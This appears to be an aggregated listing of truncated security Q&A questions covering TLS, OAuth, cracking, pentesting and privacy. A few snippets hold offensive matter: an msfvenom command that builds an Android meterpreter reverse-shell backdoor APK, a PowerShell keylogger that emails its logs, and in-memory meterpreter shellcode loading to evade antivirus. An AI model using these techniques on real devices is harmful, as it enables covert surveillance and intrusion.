security.didici.cc

Is a OCSP request verified via TLS?

12 minutes ago

I was wondering if the connection towards the ocsp responder/server is TLS encrytped itself. Meaning that the client requesting a validity check for a certificate verifies the OCSPs server certificate? If so that OCSP server should be signed by the a root ...

How much time rockyou take to bruteforce [closed]

3 hours ago

How much time rockyou.txt wordlist take to bruteforce a md5 hash password using hashcat ?

EFS-encrypted files not lost when domain admin resets password

3 hours ago

there are many articles out there stating that encrypted files of a user are lost after an administrator resets the password of that user. I tried that: Logged on as user (Domain User) with password 54321 created a file named test.txt on the desktop encry ...

Accessing router traffic

9 hours ago

I want to monitor traffic on my home router, how to do this? I have Huawei router. I have searched this question before asking here but most of the sites and blogs just mentioned about hacking and other stuffs. My case is simple I just want to monitor all ...

Is there a service that provides an api for running user-provided code in a variety of languages?

10 hours ago

I'm attempting to scaffold out a development training project, and am looking for some kind of service that provides an api that I can POST a chunk of code to (in whatever language specified), and return the results or errors of running that code. An exam ...

Can a file extension be spoofed in windows?

12 hours ago

For example can .exe file be spoofed in .txt or .mp3 in windows and still be executed as an executable. I know some basic methods like: *using right-to-left override character (U+202E) *winrar 4 zip file expoloit(no longer working) But the question is: I ...

What is a pre-warmed secret?

16 hours ago

As described here: https://tools.ietf.org/id
/draft-ietf-oauth-securit
y-topics-13.html#proposed
-countermeasures-2 Note on pre-warmed secrets: An attacker can circumvent the countermeasures described above if he is able to create or capture the respective ...

RubberDucky KeyLogger

16 hours ago

I'm working on a keylogger powershell script, but I want the logs to be sent to an email address. It is successfully doing so, except the email is only sent on machine restart, or if I manually execute the c.cmd command. Any way to schedule it, some sort ...

Does hashing an AES-GCM-256 encrypted text with SHA-512 help reveal the original password and iv for the AES-GCM-256 function

20 hours ago

If some text is encrypted using proper AES-GCM-256 encryption (with a unique password, iv, and a resultant tag) Would the AES-GCM-256 encryption in anyway be weakened, if the encrypted text was then fed into a one-way hashing SHA-512? My concern is that t ...

PCI scope "Encrypted cardholder data that is accessible to an entity that also has access to the decryption key"

20 hours ago

I have a question related to this FAQ: https://pcissc.secur
e.force.com/faq/articles/
Frequently_Asked_Question
/How-does-encrypted-cardh
older-data-impact-PCI-DSS
-scope?q=how+does+encrypt
ed+data+impact+the+scope&
amp;l=en_US&fs=Search
& It says: "The following ar ...

Crack 7Z password if I also have the original file

21 hours ago

Some of my files have been encrypted by a ransomware. So I need a password to decrypt them. I understand the password is the same for all files, and that is is impossible to guess it or to find it by massive tests. I can find some backup of files (unfortu ...

Someone found an obfuscated path on my website. Is this possible without hacking my site?

22 hours ago

I am running a server with Django and Nginx. I tried to hide the admin panel by assigning it a 50digit random string as URL (something like https://mydomain/asidfhif
uerbdsi...). Now someone found this URL and I am wondering if this was possible without ha ...

Subdomains resolving to bogon IPs

22 hours ago

During experimentation with the gobuster tool, and trying to find the subdomains matches of a domain (let's call that testdomain.com), I got some strange results and I explain. The command used was $ gobuster dns -d testdomain.com -w mywordlist.txt -o sub ...

RSA signing - Maximum input data size

22 hours ago

From what I have heard, with RSA, the data to be encrypted/signed must be smaller than the key size. So with a key size of 2048 bit I can't encrypt/sign data larger than 2048 bit. I've been playing around with node-rsa and managed to sign data larger than ...

Facial recognition countermeasures

23 hours ago

I am writing a story where the protagonist needs to assume a new identity and ensure the other party cannot ascertain his real identity. The roadblock here is that the other party can run facial recognition by taking his photo during the meetings and run ...

How can one avoid being identified by facial recognition in a public setting? [closed]

23 hours ago

Facial recognition is ubiquitous and methods like disguises, surgical masks and makeup are becoming ineffective owing to the improvement in algorithms. In light of these advances, what are some countermeasures to avoid being identified in a public setting ...

SQL injection detection engine in WAF

1 day ago

I'm working on a WAF and I found myself struggling with detecting SQL injections. I've read every single article I've seen and none of them explain how I can prevent SQLi. By reading previous questions I understand that using a bunch of if statements (or ...

Windows RPC Vulnerability (CVE-2017-8461)

1 day ago

I am currently taking classes for Cyber Security and having an issue. I have the following CVE (CVE-2017-8461) https://nvd.nist.gov/vuln
/detail/CVE-2017-8461 htt
ps://cve.mitre.org/cgi-bi
n/cvename.cgi?name=2017-8
461 There are two questions in my assignment ...

Finding info on Windows RPC Vulnerability (CVE-2017-8461)

1 day ago

I am currently taking classes for Cyber Security and having an issue. I have the following CVE (CVE-2017-8461) https://nvd.nist.gov/vuln
/detail/CVE-2017-8461 htt
ps://cve.mitre.org/cgi-bi
n/cvename.cgi?name=2017-8
461 There are two questions in my assignment ...

Is there a bank in the United States that uses email encryption with S-MIME or GPG?

1 day ago

we just founded a subsidiary in the United States. For this new legal entity we also need a bank account. With our bank account manager in Germany we can encrypt our emails using the S-MIME protocol. This is quite convenient for everybody. For me it seems ...

Openid nonce replay attack in auth code flow

1 day ago

Looking at this question Openid connect nonce replay attack and the answer by @benbotto. I understand the replay attack in implicit flow but unable to understand it for auth code flow. Let's say an attacker intercepts the authentication response. The atta ...

google-authenticator. How do I generate six digits code from my Linux desktop?

1 day ago

consider the following situation I have an account at https://www.mercadolibre.
com.ar. According to a new policy on login, I am asked to provide a six digits Google Authenticator code; I have installed google-authenticator on my Linux (Fedora) machine; I ...

Extended expiration on JWT

1 day ago

When we are talking about JWT authentication, how big of a security risk would it be to eliminate the concept of a refresh token and just have a single JWT have an expiration time of, let's say 30 days. The refresh token could still be accessed by a cooki ...

Should email password be encrypted in a django app when using TLS?

1 day ago

I have seen multiple videos/tutorials regarding how to setup the email system in Django. It seems that they all assume as long as the password is stored in an environmental variable, no encryption is required. Is that so? Shouldn't passwords be encrypted? ...

Using Github's Public IP Address as Remote URL

1 day ago

My company distributes software that runs on locally installed Ubuntu Virtual Machines. To update the software, we pull our latest code down from Github. Some IT departments have github blocked on their firewall. One IT guy suggested to us that they would ...

I need to secure my access to SQL Server for application accounts, but no one can know the application passwords. How?

1 day ago

Here's our scenario. I have a NodeJS server running that connects to a Microsoft SQL Server using an application account (SQL Basic Auth). The Username and Password were stored in the configuration files when the app was created. We now want to tighten ...

How to verify the identity of someone you met online?

1 day ago

So, I need to sign up a contract with someone I met online in order to start doing business with him. But how could I possibly know that the information he would put on the digital contract are his real info? How could I know his real name? Is there a met ...

How to generate a secure invite token in a Firebase app?

1 day ago

I have a Firebase app using Realtime Database and cloud functions In my app, a user is part of a group and has access to all the data in the group I'm trying to create a way for a user to invite another into a group Example: First, Alice logs in. She crea ...

Invoke GetProcAddress returns nothing

1 day ago

I try to execute a meterpreter shellcode to a windows machine. In order to bypass the AV, I try to load the shellcode in the memory thanks to the DelegateType Reflection technique. Below, the first lines of the powershell commands: $systemdll = ([AppDomai ...

If a malicious 3rd part app is able to intercept and modify the initial Auth_URI redirect of an OAuth flow, is it mitigable after the fact?

1 day ago

Related to a question I have at stackoverflow: https://st
ackoverflow.com/questions
/69274715/is-public-key-e
ncryption-acceptable-for-
protecting-last-leg-of-th
is-openid-conne If a malicious 3rd party app is able to intercept the initial Auth_URI redirect an ...

XSS inside of a javascript string, with unusual filter

1 day ago

While making a website I made an interesting mistake, and I'm wondering if this could be used to achieve XSS. I've come very close, but not quite. I can put my user input into a string inside of a tag. It looks something like this: // some code above so ...

Writing a remote rop chain x64

2 days ago

I am working on a blind ROP exploit, but I'm stuck at writing the ropchain. I have 2 options: -ret2libc -writi
ng a ropchain I leaked 50% of the libc and the entire binary but my problem is I can't open libc in ida, and can't use ROPgadget on it. So I'm tr ...

Looking for origin/ verification of malicious domain names

2 days ago

My network sniffer for websites has discovered a number of hosting domains in the report which I can not correctly assign to categories. I don't know if there are providers behind these domains that load tags or trackers or if malware/adware simply appear ...

Is it possible to use cookie-based single sign-on authentication scheme if sites do not share a common DNS parent domain?

2 days ago

According to Wikipedia, A simple version of single sign-on can be achieved over IP networks using cookies but only if the sites share a common DNS parent domain. This means that if the user has authenticated on login.foo.org, then the web-server on login. ...

Intercepting responses using mitmproxy in Python. Problem in decryption

2 days ago

I have set up MitmProxy with a Python script to intercept network responses from one domain, used by a Desktop App. However, when I start up the App, I get the following series of transactions { "code": 200, "message": "Success", "data": { ...

Can I safely preview a short link?

2 days ago

There are a lot of different URL shortener out there, like Bitly, goo.gl (discontinued), Ow.ly or TinyURL. Besides their main purpose of shortening a link, they also: obfuscate the actual URL, so that the user does not know in advance which URL will actua ...

MITM attack on public wi-fi and ISP wired connection

2 days ago

I know how MITM attacks work(theory/practical YT videos on the subject etc), but a bit confused and not sure what actually the worse case scenario that can happen. I'll explain. So, if I'm using a public VPN and someone indeed is able to force my device t ...

Kali Linux is prompting me for the password to 'Default Keyring' but I never set one?

2 days ago

I am trying to login to a VPN on kali linux but when I try to connect using the VPN file I have, it prompts me to unlock my default keyring, but I never set the password for it. I am using Kali Linux on VirtualBox.

Intercept and modify Server-Sent Events (EventSource API)

2 days ago

I'm working with a web application using Server-Sent Events (SSE, EventSource API), similar to WebSockets. However, none of the commonly penetration test tools seem to fully support this. I've tried Burp Professional, OWASP ZAP and mitmproxy (also with Ge ...

Possible no sql injection?

2 days ago

We are developing a application in Dotnet MVC with mongodb as a database. We use below mentioned query in order fetch the data from the database. Controller code [Get("getmsg&qu
ot;)] Public HttpResponseMessage GetMsg(int id = "", String msg = "" ) MongoDb Qu ...

problems to verify ecdsa certificate

2 days ago

I'm working on an application which uses ECDSA certificates. After the cert generation, they should be verified but currently the following error is received: C = CA, ST = BC, L = City, O = Corp, OU = Software, emailAddress = [email protected], CN = ...

School got into my daughter's personal google docs [closed]

2 days ago

My daughter was at school, on a chromebook I bought for her, on her personal account. She had a google doc with a few WW2 dark humor jokes in it she had written saved from home. No big deal. A few hours after she edited them (and I called to yell at the p ...

How to do auth without user interaction in an enterprise environment?

2 days ago

We are building a Chrome Extension that will be force-installed on each employee's browser for the companies we work with. We currently use OAuth but many employees are forgetting to sign up. We are thinking of replacing OAuth with something that doesn't ...

Is it safe to use conntrack on Linux bridge devices?

2 days ago

I have a server with a number of Linux bridge devices for use with groups of virtual machines - some internet-routed, some intentionally unrouted. I have stateful firewalling in place for traffic traversing across and between those bridges. Excerpt: ip6ta ...

client-server data sharing is not encrypted in https

3 days ago

I am using https for my website. i am not getting clear idea about how https internally works and how it makes our website more secure. if the headers or data is encrypted as mentioned here SO then it can be allow for decode or not. My Question : when i ...

Android 10 smartphone run out of service - evaluating the risk

3 days ago

I have a Nokia 6.1 Android One phone which has reached EOL in terms of security updates last april. Now I'm trying to evaluate the risk that comes from using an outdated phone. I'm using it for WhatsApp, browsing, some mailing, and my blood glucose monito ...

What's the difference between CentOS and RHEL security patches?

3 days ago

So I've been compiling security advisories for various OSs, including both CentOS and RHEL. What I find confusing is CentOS should be a "similar but different" OS from RHEL counterpart, most notably from support for security patches. When I searched for R ...

Generate key pair and antropy

3 days ago

I would like to use the method described in https://connect2id.com/pr
oducts/nimbus-jose-jwt/ex
amples/jwk-generation to generate a key pair in a java application: import java.util.*; import com.nimbusds.jose.jwk.*;
import com.nimbusds.jose.jwk.gen
.*; // ...

Generate key pair and entropy

3 days ago

I would like to use the method described in https://connect2id.com/pr
oducts/nimbus-jose-jwt/ex
amples/jwk-generation to generate a key pair in a java application: import java.util.*; import com.nimbusds.jose.jwk.*;
import com.nimbusds.jose.jwk.gen
.*; // ...

What is Google's "match the number" verification trying to achieve?

3 days ago

When I log into my Google account from my laptop with 2FA enabled, I usually get a prompt on my smartphone in order to confirm the log in. I tap OK and then I am logged in. However sometimes I am not immediately logged in after that. My laptop then shows ...

What excercise called when trying to identify an organization's risk health?

3 days ago

This is the doc i used It's about HIPPA https://dochub.com/
he141575/EB5r38Awl8kYbW4w
XzZ1kD/gibson-p1-ch-1-4-p
df?pg=88

What is the exercise called when trying to identify an organization's risk health? [closed]

3 days ago

This is the document I used. It's about HIPAA https://dochub.com/
he141575/EB5r38Awl8kYbW4w
XzZ1kD/gibson-p1-ch-1-4-p
df?pg=88

Is Using random salt to pbkdf2 for every request to rest api good/bad?

3 days ago

Here are my conditions: My rest API must accept username and plain password. But, that's very bad. That's why the client must encrypt the password first and my rest API will decrypt it to get the plain password. My client and rest API already set the encr ...

Are open wifi networks that require a user-name and password to login secure?

3 days ago

Are open wi-fi networks that require a user-name and password unique to every individual to login secure? I use Apogee wifi.

Are non-encrypted wifi networks that require a user-name and password to login secure?

3 days ago

Are open wi-fi networks that require a user-name and password unique to every individual to login secure? I use Apogee wifi.

Are non-encrypted wifi networks that require a username and password to login secure?

3 days ago

Are non-encrypted wifi networks that require a username and password unique to every individual to login secure? I use Apogee wifi.

How best to cryptographically sign scientific papers?

3 days ago

Academia has had some high profile cases of forged identity; for instance, in the last decade the publisher Springer has had to retract 62 papers for this reason alone. Usually these aren't high-effort attacks, either - simply email address spoofing, etc. ...

Ramifications of Including "localhost" in the subject alternative field of a x509 certificate

3 days ago

Are we inviting any problems if we add localhost and 127.0.0.1 to the subject alternative name field of an x509 certificate? We are still trusting the appropriate root CA, but relaxing the rules of the name just a bit.

Apple’s private relay TLS connection

3 days ago

If I switch on Apple’s private relay function on my iPad will the TLS handshake still be with the website I am visiting or with the ingress proxy by Apple? Or in other words. Can Apple or the exgress proxy read my internet traffic with this function ena ...

How to encrypt user Clear-text password Freeradius

3 days ago

I recently setup a freeradius server and would like to change user password which is presently in cleartext to encrypted in the /etc/freeradius/3.0/users file. this is what it looks like on server. Part 2 : when i authenticate on the server I can see the ...

How to encrypt user password in Freeradius [migrated]

3 days ago

I recently set up a freeradius server and would like to change the user password that is presently in cleartext to encrypted in the /etc/freeradius/3.0/users file. This is what it looks like on the server. When I authenticate on the server, I can see the ...

Is it a myth that signing up for social media puts your email open for phishing attacks?

3 days ago

So far I have owned a Google profile since 2016, and I had no problems until now when I began detecting unusual/bizarre messages in my 'Spam' folder. This suspects me that operating a social networking account (e.g., Twitter), which I did back in August, ...

Can I download a signeture of webpage on https protected connection?

3 days ago

Let's say that Malory owns an official website that now says that her birthday is on 25th of July. I can connect to that website by https, and SSL sertificate of the connection says "issued to Malory". Now I want to download that page as an evidence, that ...

Cannot find specific chat on Instagram data package

3 days ago

I've been tasked to recover a specific Instagram chat for a client, the whole conversation was deleted by the client a few months ago. My first thought was to download the client's Instagram data zip and recover the conversation history there, but this sp ...

Is using a windows user account password necessary on a PC with bitlocker and a complex pin?

3 days ago

Is there a security risk to disabling the windows user account password, since my PC is already unlocked with a complex pin at boot time? I have my PC configured with sleep disabled. I'm running windows 10 pro. For example, is windows network security red ...

Multiple Established TCP Connections on Port 3389 - Is my server compromised?

3 days ago

If i run netstat -an on my Windows Server 2019 it shows multiple connections on Port 3389 (which is RDP) The first IP Adress is mine, however i cant explain the other two connections. They both change their IP-Adress about every minute and if i google ...

Requiring Google Mobile Service token

3 days ago

I'm pentesting an android application written in Cordova and while inspecting the network traffic I found some interesting endpoint that I would like to test. However, this endpoint need a tokenID (ex. eyJ[...].eyJ[...]) and I don't know why, even after d ...

Windows Defender's MsMpEng.exe Access lsass.exe

4 days ago

I detected an activity last week on our SIEM system. The MsMpEng.exe which belongs to Windows Defender access lsass.exe. I search it on the net for learn is it a normal acitivty or is it anormal then there is no information about it. Activity's event ID i ...

Why doesn't Windows send enabled cipher suites during TLS handshake?

4 days ago

I have a system with custom cipher suites specified in this registry key HKLM\SOFTWARE\Policie
s\Microsoft\Cryptography\
Configuration\SSL\0001000
2!Functions TLS_AES_256_G
CM_SHA384 TLS_AES_128_GCM
_SHA256 TLS_ECDHE_ECDSA_W
ITH_AES_256_GCM_SHA384 TL
S_ECDHE_ECD ...

Why doesn't Windows send all enabled cipher suites during TLS handshake?

4 days ago

I have a system with custom cipher suites specified in this registry key HKLM\SOFTWARE\Policie
s\Microsoft\Cryptography\
Configuration\SSL\0001000
2!Functions TLS_AES_256_G
CM_SHA384 TLS_AES_128_GCM
_SHA256 TLS_ECDHE_ECDSA_W
ITH_AES_256_GCM_SHA384 TL
S_ECDHE_ECD ...

Can you subvert a physical system at runtime?

4 days ago

In case of a virtual machine it is possible to break out of the VM and gain code execution on the host. In that way you could evade any detection mechanism for malware inside the VM and maybe even on the host. In case of the virtual machine malware would ...

CRM with Client Side Encryption

4 days ago

I've been searching a way to create a strategy to save and secure data but I don't seem to find the answers I'm looking for so if someone has some answers to the questions I'll ask it would be helpful. The company I'm working in wants to develop a CRM tha ...

Logout functionality with JWT Session tokens

4 days ago

As per my understanding, JWTs are signed tokens which can be used to identify users, if used as session tokens, they can eliminate need to store session on server ie. they are stateless. Suppose I store user_id in JWT token and use it to validate users on ...

No User SID in the sysmon event with id 1 (process creation)

4 days ago

Why is there no user SID in the sysmon event with id 1 (process creation)? Are there any configuration options to get it?

When connecting an Arduino Uno to the internet (ethernet) what are some attacks it's susceptible to and how can I secure against them?

4 days ago

I am connecting an Arduino Uno to the internet via ethernet (using the ethernet shield v2) and querying NTP time. Making requests to a NTP server is the only internet related thing it does. You can using the ethernet shield use an SD card to host data, I ...

Servers migrated to Azure - what network security is needed

4 days ago

We used to have on-prem servers on our local network protected by a firewall. By now, we have migrated all of our servers to Azure so all we have in the office is our personal computers. Our firewalls and switches are now 6 years old and we are planning o ...

What is the latest version of ThinkPad laptops that doesn't have Intel Management Engine or similar remote controller built-in?

4 days ago

I work in cybersecurity and would like to find an older laptop that doesn't have the Intel Management Engine built-in, while still able to run a Debian OS well. I have an IBM ThinkPad t42 with 42T0273 system board laying around, which was introduced in la ...

Is it possibile to interact with firebase database using credentials obtained from an APK?

4 days ago

during the static analysis while pentesting an android application I found the following information to connect to a firebase instance. 1:**REDACTED**:
android:**REDACTED** AIza
**REDACTED** https://**RE
DACTED**.firebaseio.com *
*REDACTED** **REDACTED**.
apps ...

WMI commandline utility, console window host, and windows command processor all opening for a split second

4 days ago

Basically these 3 processes open for about 1/3 of a second and then instantly close on my task manager. I don't know what it is and I wasn't able to find anything on google about it. I am a little worried it might be malware but like I said I just don't k ...

aircrack-ng on Raspberry pi 3 and WiFi adapter

4 days ago

I am just getting into ethical hacking and cyber security and would like some advice regarding USB wifi adapter. I am hacking on Raspberry PI 3 which is running kali linux. I have been following this video: https://www.youtube.com/w
atch?v=WfYxrLaqlN8&ab
_c ...

UEFI Encrypt disk on boot

4 days ago

I want to make UEFI/UFI encrypt disk with AES on boot, is it possible? If yes, how can it be done?

Metasploit how to get target's telephone number?

4 days ago

Hello im new at metasploit and i created a backdoor with msfvenom like this: msfvenom -p android/meterpreter/rever
se_tcp LHOST= LPORT= R> /var/www/html/test.apk a
nd i connected to my android device. I can dump sms, callogs and other things but i want le ...

Metasploit how to get target phone's telephone number?

4 days ago

I'm new at metasploit and I created a backdoor with msfvenom like this: msfvenom -p android/meterpreter/rever
se_tcp LHOST= LPORT= R> /var/www/html/test.apk a
nd I connected to my android device. I can dump SMS, call logs and other things but I want to le ...

Realistically, how likely would an average "nobody" user's machine be infected with a virus that can survive a full-format re-install?

4 days ago

I've been experiencing degraded system performance due to undetermined reasons and plan on adding an M2 SSD drive to my 6 year old laptop and doing a fresh re-install. Being Windows 10, I don't have install media, and plans to grab the ISO, make a bootabl ...

Is there some way to "fully delete" received and sent SMS messages (and any other "deleted" data") on my cellphone?

4 days ago

I have a cheap cellphone bought about ten years ago. It has a physical SIM card. I have in-phone "deleted" all sent and received messages, but very strongly suspect that these are still there (as well as any deleted contacts) whether I stored them on the ...

How to do forensics on RaspberryPi in home network?

4 days ago

while debugging some strange effects in my home network (bad video call quality due to packet loss) I found out this only happens when my RBPI is connected to the network. When I wanted to log in I discovered that the default password was not working any ...

TLS session Identifiter

5 days ago

I capture traffic between my client and web server which supported by TLS 1.2. I find that session ids are different between 2 peers (client and server) in same tls handshaking process. Why should these two values be different?

Career path to security architect

5 days ago

I can't sleep because I can't find answers without advice. So, I thought of two careerpath towards security architect. #1 system admin (12)years> network engineer (12)> security architect (12) #2 system admin(5) > network engineer (10) > security architec ...

Almost unattended generation of "a pretty good keypair"

5 days ago

I need to generate quite a lot of gpg-keys for different tasks on my Debian Bullseye (Stable) machine. Also I want the highest level of security while being able to automate as much as possible. Therefore I wrote a bash-script with the following features ...

New identity in a modern setting

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Countermeasures for modern facial recognition system [closed]

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Countermeasures for one to many facial recognition [closed]

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Facial Recognition Countermeasures [closed]

5 days ago

I am writing a story where the protagonist needs to assume a new identity and ensure the other party cannot ascertain his real identity. The roadblock here is that the other party can run facial recognition by taking his photo and running it against a gov ...

Why does ECC not have an encrypt capability in GPG, but RSA does?

5 days ago

I'm attempting to establish a process for setting up a new GPG identity for myself and my threat model. Much of it is following guides which I believe are still considered best practices: https://github
.com/drduh/YubiKey-Guide
https://blogs.itemis.com
/en ...

How reliable is a mathematical model of a human fingerprint for identification?

5 days ago

How reliable is a mathematical model of a human fingerprint for identification? I am looking for a way to uniquely identify individuals that is very reliable and easy to use that does not require storing actual biometric data. Storing the actual biometric ...

Error to crack ssh key with john the ripper

5 days ago

I'm making a challenge boot2root, I obtained an ssh key through xxe, now I'm trying to crack it, i generated its hash with ssh2john: python ssh2john.py id_rsa > id_rsa.hash but when i try to crack it with john: john --wordlist=rockyou.txt id_rsa.hash jo ...

VirtualBox - Transfer file from guest to host machine

5 days ago

I'm working on malware analsys, and using VirtualBox for that. I have created virutal machine (windows 7), in which I am going to inspect the malware. I would like to send back to the host machine, the files and data from the analysis before I destroy the ...

CIS hardened linux vs SELinux(Security Enhanced)

6 days ago

What are the differences between the CIS hardened linux and SELinux(security linux)? Also, all the public cloud service providers support CIS hardened linux. Does it mean SELinux has lost the battle? Or in terms of security, which flavor should I be choos ...

Decode malicious javascript

6 days ago

Probably as most of Facebook users I receive many malicious requests with link and JS. I usually delete or ignore them, but now out of curiosity decided to research it. I've unsuccessfully tied some deobfuscating services. Full virus code is about 150K. E ...

Security Libraries and Frameworks for Java

6 days ago

I recently read that OWASP ESAPI will be discontinued and no longer be updated. Is there an alternative to OWASP ESAPI for Java and for Spring based Web Services?